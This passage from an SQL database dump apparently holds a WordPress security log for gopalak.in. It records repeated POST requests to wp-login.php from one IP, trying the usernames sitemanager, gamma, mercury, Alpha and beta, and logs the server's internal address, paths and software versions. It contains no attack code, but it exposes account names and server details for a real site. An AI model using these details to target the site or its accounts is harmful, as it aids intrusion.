23:44:41'),(94914,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53680\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746459967.1741631;s:12:\"REQUEST_TIME\";i:1746459967;}}','107.151.209.126',1,'2025-05-05 21:16:08','2025-05-06 23:44:41'),(94915,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52995\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746462160.053036;s:12:\"REQUEST_TIME\";i:1746462160;}}','107.151.209.126',1,'2025-05-05 21:52:41','2025-05-06 23:44:41'),(94916,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52996\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746462160.0642631;s:12:\"REQUEST_TIME\";i:1746462160;}}','107.151.209.126',1,'2025-05-05 21:52:41','2025-05-06 23:44:41'),(94917,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52993\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746462160.02897;s:12:\"REQUEST_TIME\";i:1746462160;}}','107.151.209.126',1,'2025-05-05 21:52:41','2025-05-06 23:44:41'),(94918,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"128\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52990\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"128\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746462160.0173011;s:12:\"REQUEST_TIME\";i:1746462160;}}','107.151.209.126',1,'2025-05-05 21:52:42','2025-05-06 23:44:41'),(94919,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52994\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746462160.023109;s:12:\"REQUEST_TIME\";i:1746462160;}}','107.151.209.126',1,'2025-05-05 21:52:42','2025-05-06 23:44:41'),(94920,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58026\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746464380.2398119;s:12:\"REQUEST_TIME\";i:1746464380;}}','107.151.209.126',1,'2025-05-05 22:29:42','2025-05-06 23:44:41'),(94921,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58028\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746464380.2621391;s:12:\"REQUEST_TIME\";i:1746464380;}}','107.151.209.126',1,'2025-05-05 22:29:42','2025-05-06 23:44:41'),(94922,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58023\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746464380.2406819;s:12:\"REQUEST_TIME\";i:1746464380;}}','107.151.209.126',1,'2025-05-05 22:29:42','2025-05-06 23:44:41'),(94923,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58025\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746464380.2498569;s:12:\"REQUEST_TIME\";i:1746464380;}}','107.151.209.126',1,'2025-05-05 22:29:42','2025-05-06 23:44:41'),(94924,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58024\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746464380.2331519;s:12:\"REQUEST_TIME\";i:1746464380;}}','107.151.209.126',1,'2025-05-05 22:29:42','2025-05-06 23:44:41'),(94925,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58850\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746466636.182595;s:12:\"REQUEST_TIME\";i:1746466636;}}','107.151.209.126',1,'2025-05-05 23:07:17','2025-05-06 